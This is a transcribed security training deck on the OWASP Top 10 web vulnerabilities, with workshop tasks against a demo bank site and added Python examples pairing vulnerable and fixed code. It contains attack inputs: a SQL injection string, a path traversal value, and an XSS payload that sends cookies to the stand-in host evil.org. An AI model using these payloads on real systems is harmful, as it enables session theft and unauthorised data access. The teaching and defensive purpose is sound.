2007 SF ISACA Fall Conference - Hacking 101 Final · 2008. 8. 12.
Page 1

San Francisco Chapter

Hacking 101: Understanding the Top Web Application Vulnerabilities and How to Protect Against the Next Level of Attack

Armando Bioc

Security Consultant

Watchfire, an IBM Company

Page 2

Agenda

• Module 1: Security Landscape

• Module 2: Top Attacks Overview

– Demo of Manual Techniques

• Module 3: Hands-on Workshop

• Module 4: Demo of Automated Techniques

• Module 5: An Enterprise Vision

Page 3

Module 1: Security Landscape

Page 4

Objective

1. Understand the web application environment

2. Understand and differentiate between network and application level vulnerabilities

3. Understand where the vulnerabilities exist

Page 5

Eight Principles of Security Management

1. Compliance Management

2. Risk Management

3. Identity Management

4. Authorization Management

5. Accountability Management

6. Availability Management

7. Configuration Management

8. Incident Management

Page 6

High Level Network Architecture (diagram)

Page 7

Security Product Landscape

Security Management

– Policy & Compliance: Hewlett-Packard, CA, Cisco, Microsoft, Sun

– Incident Management: ArcSight, NetForensics, Symantec, CA, Net Intelligence

– Configuration Management: NetIQ, Symantec, CA, Hewlett-Packard, Altiris

– Patching & Remediation: Patchlink, Shavlik, St. Bernard, Microsoft, Hewlett-Packard

– Forensics Investigation: Guidance, Niksun, CA, SenSage, Net Intelligence

Vulnerability Assessment

– Network: Tenable Nessus, ISS, Qualys, eEye, McAfee

– Host-Based: Symantec, NetIQ, ISS, CA, Harris STAT

– Application, Database Only: AppSec Inc, NGS Software

– Application, Black-Box: Watchfire, SPI Dynamics, Cenzic, Acunetix

– Application, White-Box: Fortify, Ounce Labs, Secure Soft, Klocwork

Page 8

Black Box vs. White Box: Where?

Code fragment shown on the slide (the encoding loop is cut off on the slide itself):

    function b64(sText) {
      if (!sText) { sText = ''; }
      if (typeof sText == 'object') {
        sText = String(sText);
        if (sText.match(/^\[(.*)+\]$/)) { sText = 'unknown'; }
      }
      var sOut = '';
      var chr1, chr2, chr3 = '';
      var enc1, enc2, enc3, enc4 = '';
      var i = 0;
      var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
      // ... remainder not visible on the slide
    }

Layer diagram: User → UI → Application Logic → DB / FS, all running on Infrastructure.

Page 9

Black Box vs. White Box: What?

(Same code fragment and layer diagram as Page 8.)

Page 10

High Level Web Application Architecture Review

Client Tier (Browser) → Internet → Firewall → Middle Tier: Web Server (Presentation), App Server (Business Logic) → Data Tier: Database

– Sensitive data is stored in the database (data tier)

– SSL protects the transport; the firewall protects the network

– The customer application is deployed in the middle tier

Page 11

Network Defenses for Web Applications

• Perimeter: Firewall, IDS (Intrusion Detection System), IPS (Intrusion Prevention System)

• Application Firewall

• SIEM (Security Information and Event Management)

Page 12

Web Applications – Shared Traits

• Get input from user in different ways

– Path, Parameters, Cookies, Headers, etc.

• Use back-end servers

– DB, LDAP/AD Server, etc.

• Use session tokens (cookie, parameter, path…)

– Session tokens may be persistent or not

• Hold public & private information

– Sensitive info often past the login page

Page 13

Web Application Security: What Can Happen?

• Sensitive data leakage

– Customer, partner or company data

• Identity Theft

– Hacker impersonating a trusted user

• Defacement – Content Modification

– Hurts brand, misleads customers, etc.

• Application Shutdown (Site Unavailable)

– Lack of access can cause major losses

Page 14

Open Source & Manual Products

• Proxies

– WebScarab

– Fiddler

– Paros

– Burp

– Spike

• HTTP Editors

– [See above]

– Mozilla Tamper Data

– Netcat

• Fuzzers

– SensePost Crowbar

– JBroFuzz

• Database Exploit

– Absinthe

– SQL Power Injector

• General Exploit

– Metasploit

Page 15

Where are the Vulnerabilities?

Layer stack (bottom to top):

– Network

– Operating System

– Applications (Database, Web Server)

– Web Server Configuration

– Third-party Components

– Web Applications (Client-Side, Custom, Web Services)

Page 16

Where are the Vulnerabilities? – Network

Blackbox scanners that evaluate all network objects for patches and vulnerabilities

Page 17

Where are the Vulnerabilities? – Host

Authenticated agents that evaluate the underlying operating system

Page 18

Where are the Vulnerabilities? – Database

Evaluate the database for missing patches, poor configuration and vulnerabilities

Page 19

Where are the Vulnerabilities? – App Scanners

Scan the web application to uncover vulnerabilities

Page 20

Where are the Vulnerabilities? – Code Scan

Parse software source code to determine policy violations and poor practices

Page 21

Where are the Vulnerabilities? (full layer stack again, as on Page 15: Network; Operating System; Applications, Database, Web Server; Web Server Configuration; Third-party Components; Web Applications: Client-Side, Custom, Web Services)

Page 22

Top Attacks Overview

Page 23

The Myth: “Our Site Is Safe”

• We Have Firewalls in Place

• We Use Network Vulnerability Scanners

• We Audit It Once a Quarter with Pen Testers

• We Use SSL Encryption

Page 24

The Reality: Security and Spending Are Unbalanced

                    % of Attacks    % of Dollars
Web Applications        75%             10%
Network / Server        25%             90%

75% of all attacks on information security are directed to the web application layer.

2/3 of all web applications are vulnerable.

Sources: Gartner, Watchfire

Page 25

2006 Vulnerability Statistics (31,373 sites)

** http://www.webappsec.org/projects/statistics/

Page 26

What is a Web Application?

• The business logic that enables:

– User’s interaction with a Web site

– Transacting/interfacing with back-end data systems (databases, CRM, ERP etc.)

• In the form of:

– 3rd party packaged software, i.e. web server, application server, software packages etc.

– Code developed in-house / web builder / system integrator

Input and output flow through each layer of the application; a break in any layer breaks the whole application:

Browser → User Input (HTML/HTTP) → Web Server → User Interface Code → Front end Application → Backend Application → Database (Data)

Page 27

Infrastructure vs. Application Security Issues

Application Specific Vulnerabilities vs. Infrastructure Vulnerabilities:

• Cause of Defect

– Application: Insecure development of your own applications

– Infrastructure: Insecure development or deployment of 3rd party SW

• Location of Vulnerability

– Application: Application Code, often resides on Application Server

– Infrastructure: 3rd party infrastructure (web server, OS, etc.)

• Method of Exploits

– Application: Probing hacks, suspicious content, information leakage

– Infrastructure: Known vulnerabilities (0-day), signature based

• What to do

– Application: Training & Scanners – across the Development Life Cycle

– Infrastructure: Update patches, use trusted 3rd party software

• Detection

– Application: App Security Scanners

– Infrastructure: Patch Management system

– Both: Internal/External Audits, Automated Scanners

Page 28

WASC

• Web Application Security Consortium (WASC)

Purpose:

– To develop, adopt, and advocate standards for web application security

• Official web site: www.webappsec.org

• Web Security Threat Classification project: http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.pdf

Purpose:

– Clarify and organize the threats to the security of a web site

– Develop and promote industry standard terminology for these issues

Page 29

WASC – Threat Classifications (Web Application Security Consortium) www.webappsec.org

Application Threat / Attack Types / Example Business Impact

• Authentication – Attacks that target a web site’s method of validating the identity of a user, service or application.

– Brute Force

– Insufficient Authentication

– Weak Password Recovery Validation

• Authorization – Attacks that target a web site’s method of determining if a user, service or application has the necessary permissions to perform a requested action.

– Credential/Session Prediction

– Insufficient Authorization

– Insufficient Session Expiration

– Session Fixation

• Client-side Attacks – The abuse or exploitation of a web site’s users (breaching trust relationships between a user and a web site).

– Content Spoofing

– Cross Site Scripting

• Command Execution – Attacks designed to execute remote commands on the web site by manipulating user-supplied input fields.

– Buffer Overflow

– Format String Attack

– LDAP Injection

– OS Commanding

– SQL Injection

– SSI Injection

– XPath Injection

Example business impacts noted on the slide: misdirect customers to a bogus site; change parameters, e.g. total contribution > 100%.

Page 30

WASC – Threat Classifications (Web Application Security Consortium) www.webappsec.org (continued)

• Information Disclosure – Attacks designed to acquire system specific information about a web site. This includes software distribution, version numbers, patch levels, and also secure file locations.

– Directory Indexing

– Information Leakage

– Path Traversal

– Predictable Resource Location

• Logical Attacks – The abuse or exploitation of a web application logic flow (password recovery, account registration, auction bidding and eCommerce purchasing are examples of application logic).

– Abuse of Functionality

– Denial of Service

– Insufficient Anti-automation

– Insufficient Process Validation

Page 31

OWASP

• Open Web Application Security Project

Purpose: Dedicated to finding and fighting the causes of insecure software.

• Official web site: www.owasp.org

• The OWASP Top Ten project http://www.owasp.org/index.php/OWASP_Top_Ten_Project

• Purpose:

– A broad consensus about what the most critical web application security flaws are

– Raise awareness of web application security issues

• We will use the Top 10 list to cover some of the most common security issues in web applications

Page 32

The OWASP Top 10 Application Attacks

Application Threat / Negative Impact / Example Impact

• Cross Site Scripting

– Negative Impact: Identity Theft, Sensitive Information Leakage, …

– Example: Hackers can impersonate legitimate users, and control their accounts.

• Injection Flaws

– Negative Impact: Attacker can manipulate queries to the DB / LDAP / other system

– Example: Hackers can access backend database information, alter it or steal it.

• Malicious File Execution

– Negative Impact: Execute shell commands on server, up to full control

– Example: Site modified to transfer all interactions to the hacker.

• Insecure Direct Object Reference

– Negative Impact: Attacker can access sensitive files and resources

– Example: Web application returns contents of a sensitive file (instead of a harmless one)

• Cross-Site Request Forgery

– Negative Impact: Attacker can invoke “blind” actions on web applications, impersonating a trusted user

– Example: Blind requests to bank account transfer money to hacker

• Information Leakage and Improper Error Handling

– Negative Impact: Attackers can gain detailed system information

– Example: Malicious system reconnaissance may assist in developing further attacks

• Broken Authentication & Session Management

– Negative Impact: Session tokens not guarded or invalidated properly

– Example: Hacker can “force” a session token on the victim; session tokens can be stolen after logout

• Insecure Cryptographic Storage

– Negative Impact: Weak encryption techniques may lead to broken encryption

– Example: Confidential information (SSN, Credit Cards) can be decrypted by malicious users

• Insecure Communications

– Negative Impact: Sensitive info sent unencrypted over an insecure channel

– Example: Unencrypted credentials “sniffed” and used by hacker to impersonate user

• Failure to Restrict URL Access

– Negative Impact: Hacker can access unauthorized resources

– Example: Hacker can forcefully browse and access a page past the login page

Page 33

1. Cross-Site Scripting (XSS)

• What is it?

– Malicious script echoed back into HTML returned from a trusted site, and runs under trusted context

• What are the implications?

– Session Tokens stolen (browser security circumvented)

– Complete page content compromised

– Future pages in browser compromised

Page 34

XSS Example I

HTML code:

Page 35

XSS Example II

HTML code:

Page 36

XSS – Details

• Common in Search, Error Pages and returned forms

– But can be found on any type of page

• Any input may be echoed back

– Path, Query, Post-data, Cookie, Header, etc.

• Browser technology used to aid attack

– XMLHttpRequest (AJAX), Flash, IFrame…

• Has many variations

– XSS in attribute, DOM Based XSS, etc.
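The two XSS variations the slide names, as an added example that is not part of the original deck: a search page that echoes the query into the HTML body (the classic reflected case), and a "back" link that places a user-supplied URL into an href attribute. Each is shown beside its hardened form. The page layout, function names and the http/https allow-list for the link are assumptions for this illustration; the payloads are constructed in the spirit of the cookie-stealing script on the following slides.

```python
import html


def search_page_vulnerable(query):
    """Search results page that echoes the user's term straight into the HTML body."""
    return "<p>Results for: " + query + "</p>"


def search_page_escaped(query):
    """Same page, with the term entity-encoded for the HTML body context."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def back_link_vulnerable(return_url):
    """Attribute context: a 'return to' URL placed in href without any checks."""
    return '<a href="' + return_url + '">back</a>'


def back_link_hardened(return_url):
    """Attribute context needs two things: quote encoding, so the value cannot
    close the attribute and start an event handler, and a scheme check, so a
    javascript: URL cannot become the link target. The http/https allow-list is
    an assumption about what this hypothetical application needs."""
    candidate = return_url.strip()
    if not candidate.lower().startswith(("http://", "https://")):
        candidate = "#"
    return '<a href="' + html.escape(candidate, quote=True) + '">back</a>'


if __name__ == "__main__":
    # Constructed payloads, not taken from the slides.
    body_payload = '<script>new Image().src="http://evil.org/c?"+document.cookie</script>'
    attr_payload = '" onmouseover="alert(document.cookie)'
    print(search_page_vulnerable(body_payload))   # script tag reaches the browser intact
    print(search_page_escaped(body_payload))      # &lt;script&gt;... rendered as text
    print(back_link_vulnerable(attr_payload))     # attribute closed, event handler injected
    print(back_link_hardened(attr_payload))       # <a href="#">back</a>
    print(back_link_hardened("javascript:alert(1)"))
```

Encoding is context-specific: html.escape is right for the body and for quoted attributes, but a value dropped into a script block or a URL needs the encoding for that context, which is why the attribute case also validates the scheme rather than relying on escaping alone.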

Page 37

Cross Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.com sent to user via e-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

5) Evil.org uses stolen session information to impersonate user

Page 38

Exploiting XSS

• If I can get you to run my JavaScript, I can…

– Steal your cookies for the domain you’re browsing

– Track every action you do in that browser from now on

– Redirect you to a Phishing site

– Completely modify the content of any page you see on this domain

– Exploit browser vulnerabilities to take over machine

– …

• XSS is the Top Security Risk today (most exploited)

Page 39

Sticky/Embedded XSS (XSS Worms)

• Embedding malicious script in persistent location

– “Talkback” section

– Forum/Newsgroup

• Boosted with Web 2.0 trend

– Customizable content

– More user content (communities)

• XSS Can “Infest” more pages - Worm

– MySpace worm (Samy, October 2005)

Page 40

2. Injection Flaws

• What is it?

– User-supplied data is sent to an interpreter as part of a command, query or data.

• What are the implications?

– SQL Injection – Access/modify data in DB

– SSI Injection – Execute commands on server and access sensitive data

– LDAP Injection – Bypass authentication

– …

Page 41

SQL Injection

• User input inserted into SQL Command:

– Get product details by id: Select * from products where id='$REQUEST["id"]';

– Hack: send param id with value ' or '1'='1

– Resulting executed SQL: Select * from products where id='' or '1'='1'

– All products returned
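The slide's query run for real, as an added example that is not part of the original deck: an in-memory SQLite table stands in for the product database, the vulnerable lookup splices the id parameter into the SQL text exactly as the slide shows, and the fixed version binds it as a parameter. The table contents and function names are constructed for this illustration.

```python
import sqlite3

# Constructed product table (not from the deck). The id column is TEXT because
# the slide's query wraps the id in quotes.
PRODUCTS = [("1", "widget", 9.99), ("2", "gadget", 19.99), ("3", "unreleased-item", 0.0)]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id TEXT, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def product_lookup_vulnerable(product_id):
    """The slide's pattern: the request parameter is spliced into the SQL text.
    Returns (sql_actually_executed, rows) so the injected statement is visible."""
    sql = "SELECT * FROM products WHERE id='%s'" % product_id
    conn = _connect()
    try:
        return sql, conn.execute(sql).fetchall()
    finally:
        conn.close()


def product_lookup_parameterized(product_id):
    """Fix: bind the value. The driver passes it as data, so quotes inside it are
    just characters and can never change the shape of the statement."""
    conn = _connect()
    try:
        return conn.execute("SELECT * FROM products WHERE id=?", (product_id,)).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    payload = "' or '1'='1"
    sql, rows = product_lookup_vulnerable(payload)
    print(sql)        # SELECT * FROM products WHERE id='' or '1'='1'
    print(len(rows))  # 3: every product, including the one that was never meant to be listed
    print(product_lookup_parameterized(payload))  # []: no product has that literal id
```

Parameterization is the fix because it separates code from data at the driver level; escaping quotes by hand is fragile (numeric contexts, different quoting rules per database) and is the approach that keeps producing new injection bugs.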

Page 42

SQL Injection Example I

Page 43

SQL Injection Example II

Page 44

SQL Injection Example - Exploit

Page 45

SQL Injection Example - Outcome

Page 46

Injection Flaws – More Info

• One SQL Injection compromises entire DB

– Doesn’t matter if it’s a remote page

• Not limited to SQL Injection

– LDAP, XPath, SSI, MX (Mail)…

– HTML Injection (Cross Site Scripting)

– HTTP Injection (HTTP Response Splitting)

Page 47

Injection Flaws (SSI Injection Example) Creating commands from input

Page 48

The return is the private SSL key of the server

Page 49

3. Malicious File Execution

• What is it?

– Application tricked into executing commands or creating files on server

• What are the implications?

– Command execution on server – complete takeover

– Site Defacement, including XSS option

Page 50

Malicious File Execution – Example I

Page 51

Malicious File Execution – Example cont.

Page 52

Malicious File Execution – Example cont.

Page 53

4. Insecure Direct Object Reference

• What is it?

– Part or all of a resource (file, table, etc.) name controlled by user input.

• What are the implications?

– Access to sensitive resources

– Information Leakage, aids future hacks
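A file-download handler with the flaw described above, as an added example that is not part of the original deck: the vulnerable version builds the path from the request, so both traversal (../../etc/passwd) and another user's document are reachable; the hardened version confines the normalised path to the document root and checks ownership, and a third variant replaces the direct file name with a per-user indirect reference. The directory, file names and ownership table are constructed for this illustration.

```python
import posixpath

# Hypothetical document store (constructed data, not from the deck): files live
# under BASE and each file name maps to the user who owns it.
BASE = "/srv/app/docs"
OWNERS = {"1001.pdf": "alice", "1002.pdf": "bob"}
# Indirect references: per user, an opaque key the client is allowed to send.
INDIRECT = {"alice": {"a": "1001.pdf"}, "bob": {"a": "1002.pdf"}}


def document_path_vulnerable(requested_name):
    """The slide's flaw: the resource name comes straight from the request."""
    return posixpath.join(BASE, requested_name)


def document_path_hardened(user, requested_name):
    """Two checks the vulnerable version lacks: containment (the normalised path
    must stay under BASE) and authorisation (the caller must own the object).
    Returns the safe path, or None when the request must be refused."""
    target = posixpath.normpath(posixpath.join(BASE, requested_name))
    # join() discards BASE when requested_name is absolute, and normpath()
    # resolves '..', so commonpath() catches both escape routes.
    if target == BASE or posixpath.commonpath([BASE, target]) != BASE:
        return None
    if OWNERS.get(posixpath.basename(target)) != user:
        return None
    return target


def document_path_indirect(user, ref):
    """Alternative: the client never names the file; it sends a per-user key that
    is looked up server-side, so there is no direct reference to tamper with."""
    name = INDIRECT.get(user, {}).get(ref)
    return None if name is None else posixpath.join(BASE, name)


if __name__ == "__main__":
    print(document_path_vulnerable("../../etc/passwd"))        # escapes the document root
    print(document_path_hardened("alice", "../../etc/passwd"))  # None
    print(document_path_hardened("alice", "1002.pdf"))          # None: bob's file
    print(document_path_hardened("alice", "1001.pdf"))          # /srv/app/docs/1001.pdf
    print(document_path_indirect("alice", "a"))                 # /srv/app/docs/1001.pdf
```

The containment check alone stops path traversal but not the slide's point: a user reading another user's file through a perfectly well-formed name. The ownership lookup (or the indirect map) is what addresses the direct object reference itself.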

Page 54

Insecure Direct Object Reference -Example

Page 55

Insecure Direct Object Reference –Example Cont.

Page 56

Insecure Direct Object Reference –Example Cont.

Page 57

5. Cross Site Request Forgery (CSRF/XSRF)

• What is it?

– Tricking a victim into sending an unwitting (often blind) request to another site, using the user’s session and/or network access.

• What are the implications?

– Internal network compromised

– User’s web-based accounts exploited

Page 58

XSRF Exploit Illustration

1) Victim browses a page on Evil.org with malicious content

2) Script (or link) is downloaded and executed in the browser, which sends requests to sites the victim is logged in to or can reach:

• Bank.com: 3) Money transferred → 4) Money withdrawn

• WebMail: 3) All mails forwarded to hacker → 4) Private mails accessed, possibly containing passwords

• Wireless Router: 3) Router opened for outside access → 4) Firewalls bypassed, internal computers hacked

Page 59

XSRF vs. XSS

• XSS Exploits the trust a user gives a site

– Cookies and data access to specific domain

• XSRF Exploits the trust a site gives a user

– User “logged in” to site or has access to site (Intranet)

• XSRF may be delivered via XSS (or Sticky XSS)

• XSS may be auto-exploited via XSRF

– XSRF on one site exploits XSS on another – hands free
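The bank transfer from the illustration two slides back, as an added example that is not part of the original deck: a handler that acts on the session cookie alone (so a hidden auto-submitting form on evil.org succeeds) beside one protected by a per-session synchronizer token and an Origin check. The site name, form fields and function names are assumptions for this illustration.

```python
import hmac
import secrets

# Hypothetical origin of the protected application (an assumption, not from the deck).
SITE_ORIGIN = "https://bank.com"


class Session:
    """Server-side session. The CSRF token is random and bound to this session only."""

    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)


def transfer_form(session):
    """The legitimate page embeds the token. A page on evil.org cannot read it,
    because the same-origin policy keeps bank.com's responses away from its script."""
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="csrf" value="%s">'
            '<input name="to"><input name="amount"><input type="submit"></form>'
            % session.csrf_token)


def transfer_vulnerable(session, form):
    """Trusts the cookie alone: any request the browser sends with it is honoured,
    including one triggered by a form the victim never saw."""
    return {"status": "ok", "from": session.user, "to": form["to"], "amount": form["amount"]}


def transfer_protected(session, form, origin=None):
    """Reject unless the request proves it came from our own page."""
    supplied = form.get("csrf", "")
    # Constant-time comparison; encode both sides so non-ASCII input cannot raise.
    if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
        return {"status": "rejected", "reason": "missing or invalid CSRF token"}
    # Defence in depth: browsers attach an Origin header to cross-site POSTs.
    # When it is present it must be ours; its absence alone is not proof of anything.
    if origin is not None and origin != SITE_ORIGIN:
        return {"status": "rejected", "reason": "cross-origin request"}
    return {"status": "ok", "from": session.user, "to": form["to"], "amount": form["amount"]}


if __name__ == "__main__":
    victim = Session("victim")
    forged = {"to": "hacker", "amount": "1000"}          # what evil.org's hidden form posts
    print(transfer_vulnerable(victim, forged))            # money moves
    print(transfer_protected(victim, forged, origin="http://evil.org"))   # rejected
    legit = dict(forged, csrf=victim.csrf_token)          # only bank.com's own page has this
    print(transfer_protected(victim, legit, origin=SITE_ORIGIN))          # ok
```

The token must be tied to the session and compared in constant time; a site-wide constant, or a token that is also readable through an XSS hole on the same site, gives no protection, which is the point of the "XSRF may be delivered via XSS" bullet above.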

Page 60

6. Information Leakage and Improper Error Handling

• What is it?

– Unneeded information made available via errors or other means.

• What are the implications?

– Sensitive data exposed

– Web App internals and logic exposed (source code, SQL syntax, exception call stacks, etc.)

– Information aids in further hacks

Page 61

Information Leakage - Example

Page 62

Improper Error Handling - Example

Page 63

Information Leakage – Different Username/Password Error

Page 64

7. Broken Authentication and Session Management

• What is it?

– Session tokens aren’t guarded and invalidated properly

• What are the implications?

– Session tokens can be planted by hacker in XSS/XSRF attack, hence leaked

– Session tokens more easily available (valid longer, less protection) to be stolen in different ways

Page 65

Broken Authentication and Session Management - Examples

• Unprotected Session Tokens

– Session ID kept in Persistent Cookie

– Not using the HttpOnly flag on cookies

• Sessions valid for too long

– Session not invalidated after logout

– Session timeout too long

• Session fixation possible

– Session ID not replaced after login (hence can be fixed)
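An added example, not code from the deck, showing the three fixes this slide implies in one small session store: a fresh random ID is issued at login (so any ID fixed beforehand is discarded), the cookie is non-persistent with HttpOnly and Secure set, and logout and idle timeout invalidate the session on the server. The 15-minute timeout and the in-memory store are assumptions.

```python
import secrets

IDLE_TIMEOUT = 15 * 60  # seconds; an assumed policy value, not from the deck


class SessionStore:
    """Constructed in-memory session table; a real app would back it with a DB or cache."""

    def __init__(self):
        self.sessions = {}  # sid -> {"user": str or None, "last_seen": float}

    @staticmethod
    def _new_id():
        # 256 bits from the OS CSPRNG: unguessable, unlike the 1, 2, 4, 6, ... IDs on slide 67.
        return secrets.token_urlsafe(32)

    def login(self, user, now, pre_login_sid=None):
        """Issue a brand-new ID at login. Whatever ID the client held before (possibly one
        an attacker fixed in its browser) is dropped, so it never becomes a logged-in session."""
        if pre_login_sid is not None:
            self.sessions.pop(pre_login_sid, None)
        sid = self._new_id()
        self.sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def resolve(self, sid, now):
        """Map a cookie value to a user; idle sessions expire on the server side."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT:
            del self.sessions[sid]  # enforced here, not by trusting the browser to forget
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid):
        """Invalidate server-side; clearing the cookie alone would leave a stolen copy valid."""
        self.sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: no Expires/Max-Age (dies with the browser, not persistent), HttpOnly
    (document.cookie cannot read it, blunting the XSS theft on slide 90), Secure (HTTPS only)."""
    return f"sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"
```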

Page 66

8. Insecure Cryptographic Storage

• What is it?

– Weak or no cryptographic protection on sensitive resources at rest

– Lack of safeguards on keys

• What are the implications?

– Session tokens can be predicted (due to weak, often homegrown, algorithms)

– Sensitive data available through DB access (internal hacker, SQL Injection, etc.)

Page 67

Insecure Cryptographic Storage: Weak Session Token

• Hacker samples session IDs and gets: 1, 2, 4, 6, 7, 10, 11, 15, …

• Can you predict other valid sessions? (Hint: other users may enter the site and get sessions during the hacker's sampling)

• Points to consider:

– Doesn’t need to be that simple…

– Keys may be predictable (e.g. timestamp)

Page 68

9. Insecure Communication

• What is it?

– Sensitive data sent over unencrypted channels

• What are the implications?

– Data can be stolen or manipulated by Internal or External hacker

Page 69

Insecure Communication: Points to Consider

• Not only the login page is sensitive

– Anything after it is too, and maybe more

• Internal Hackers are a threat

– Encrypt internal communications as well

• Use strong encryption keys

– See previous topic…

Page 70

10. Failure to Restrict URL Access

• What is it?

– Resources that should only be available to authorized users can be accessed by forcefully browsing them

• What are the implications?

– Sensitive information leaked/modified

– Admin privileges made available to hacker

Page 71

Failure to Restrict URL Access - Admin User login

/admin/admin.aspx

Page 72

Simple user logs in, forcefully browses to admin page

Page 73

Failure to Restrict URL Access: Privilege Escalation Types

• Access given to completely restricted resources

– Accessing files that shouldn’t be served (*.bak, “Copy Of”, *.inc, *.cs, ws_ftp.log, etc.)

• Vertical Privilege Escalation

– Unknown user accessing pages past login page

– Simple user accessing admin pages

• Horizontal Privilege Escalation

– User accessing other user’s pages

– Example: Bank account user accessing another’s
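Server-side authorization covering all three escalation types on this slide, as an added example that is not the Altoro Mutual application's code: every request is checked against the user's role and ownership, and backup/source files are refused regardless of who asks. The role table, account ownership map, public-page list and the path layout are constructed for the demonstration; the file extensions come from the bullet above.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed data: roles and account ownership a real app would hold in its database.
ROLE = {"jsmith": "user", "admin": "admin"}
ACCOUNT_OWNER = {"800000": "jsmith", "800001": "mdoe"}
# Slide 73's "completely restricted" resources: never served, whoever asks.
NEVER_SERVE_EXT = {".bak", ".inc", ".cs", ".log", ".old"}
PUBLIC = {"/", "/default.aspx", "/bank/login.aspx"}  # assumed public pages


def _under(path, prefix):
    return path == prefix or path.startswith(prefix + "/")


def authorize(url, user):
    """Decide server-side whether `user` (None = anonymous) may fetch `url`.
    Returns (http_status, reason). Every request passes through here; a page
    being unlinked or 'hidden' is never treated as protection."""
    parts = urlsplit(url)
    path = posixpath.normpath(parts.path)  # collapse /bank/../admin style paths first
    name = posixpath.basename(path).lower()
    if posixpath.splitext(name)[1] in NEVER_SERVE_EXT or name.startswith("copy of"):
        return 404, "backup/source/log files are never served"
    if path in PUBLIC:
        return 200, "public page"
    if _under(path, "/admin"):
        if user is None:
            return 401, "login required"
        if ROLE.get(user) != "admin":  # vertical escalation: simple user -> admin pages
            return 403, "admin role required"
        return 200, "admin page"
    if _under(path, "/bank"):
        if user is None:  # vertical escalation: unknown user past the login page
            return 401, "login required"
        account = parse_qs(parts.query).get("id", [None])[0]
        if account is not None and ACCOUNT_OWNER.get(account) != user:
            return 403, "not the account owner"  # horizontal escalation
        return 200, "own account data"
    return 200, "public page"
```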

Page 74

The OWASP Top 10 Application Attacks

(Table columns: Application Threat – Negative Impact – Example Impact)

• Cross Site Scripting

– Negative impact: Identity theft, sensitive information leakage, …

– Example impact: Hackers can impersonate legitimate users and control their accounts.

• Injection Flaws

– Negative impact: Attacker can manipulate queries to the DB / LDAP / other system

– Example impact: Hackers can access backend database information, alter it or steal it.

• Malicious File Execution

– Negative impact: Execute shell commands on server, up to full control

– Example impact: Site modified to transfer all interactions to the hacker.

• Insecure Direct Object Reference

– Negative impact: Attacker can access sensitive files and resources

– Example impact: Web application returns contents of sensitive file (instead of harmless one)

• Cross-Site Request Forgery

– Negative impact: Attacker can invoke "blind" actions on web applications, impersonating a trusted user

– Example impact: Blind requests to bank account transfer money to hacker

• Information Leakage and Improper Error Handling

– Negative impact: Attackers can gain detailed system information

– Example impact: Malicious system reconnaissance may assist in developing further attacks

• Broken Authentication & Session Management

– Negative impact: Session tokens not guarded or invalidated properly

– Example impact: Hacker can "force" session token on victim; session tokens can be stolen after logout

• Insecure Cryptographic Storage

– Negative impact: Weak encryption techniques may lead to broken encryption

– Example impact: Confidential information (SSN, credit cards) can be decrypted by malicious users

• Insecure Communications

– Negative impact: Sensitive info sent unencrypted over insecure channel

– Example impact: Unencrypted credentials "sniffed" and used by hacker to impersonate user

• Failure to Restrict URL Access

– Negative impact: Hacker can access unauthorized resources

– Example impact: Hacker can forcefully browse and access a page past the login page

Page 75

Module 3: Hands-on Workshop

Page 76

Objective

Hacking 101:

• Understand reconnaissance and profiling

1. Hands-on: Find vulnerabilities and exploit

a) Failure to restrict URL access and information leakage

b) Cross site scripting (XSS)

c) SQL Injection

d) Advanced SQL Injection

2. Understand the difference between a vulnerability and an exploit

Page 77

Profiling a web application

Page 78

Reconnaissance and Profiling

• Platform

– Technologies

– Application servers

– Web servers

– Web server authentication

– Database usage

– Database type

– Third-party components

• Application

– Authentication

– Authorization

– Web based administration

– User contributed content

– Client side validation

– Password creation

– Session state

– Error handling

– Application logic

Page 79

How much did you find?

• Platform

– .NET, JavaScript

– IIS 5.0+

– Anonymous web server authentication

– Database in use

– MS SQL? Access?

– User management connections?

• Application

– Form based authentication

– User based authorization

– Yes = /Admin

– No social contribution areas

– No password reset

– Cookies (several)

– Custom error pages

– CGI execution

Page 80

Task 1: Access the Administration section

• Step 1: Forceful browse to administration section

– Does it exist?

– The URL for the banking application is: http://demo.testfire.net/bank

• What might the administrative application be?

– Is there a default page?

– What might you name a login page?

• What was it for the banking application?

– http://demo.testfire.net/bank/login.aspx

• Step 2: Ask some questions about the login page

– Is there a username associated with the password?

– Is the password static?

– What might I use for a password?

– Where might I look for a password?

• Step 3: Exploit

Page 81

Action: Navigate to admin directory

We learn: Administration section exists

Page 82

Action: Navigate to login.aspx page

We learn: Common naming practices

Page 83

Action: View page source

We learn: The PASSWORD

Page 84

Solution – Forceful browsing

• Navigate to http://demo.testfire.net

• Try http://demo.testfire.net/administration

– Fails

• Try http://demo.testfire.net/admin

– Success

– No default page

• Try http://demo.testfire.net/admin/logon.aspx

– Failure

• Try http://demo.testfire.net/admin/login.aspx

– Success

Page 85

Solution – Information Leakage

• The administration section uses a single password

• Try to guess the password

– Password, password, password1, Password1

– Admin, admin, Admin1, admin1

– Altoro, Altoro, Altoro1, altoro1

• View the page source

• Search for comments

– Success

Page 86

Task 2: Steal the user cookie

• Step 1: Determine the best attack method

– How do I force the client to run my commands?

– What scripting language are almost all browsers able to execute?

• Step 2: Find the application vulnerability

– Where might I be able to include content within an application?

– What does the payload look like?

– How do I access the client cookie?

• Step 3: Exploit

– Discussion Topic

• How do I send this cookie from the victim to the attacker?

Page 87

Action: Enter search text

We learn: Content is echoed back to page

Page 88

Action: Enter JavaScript command

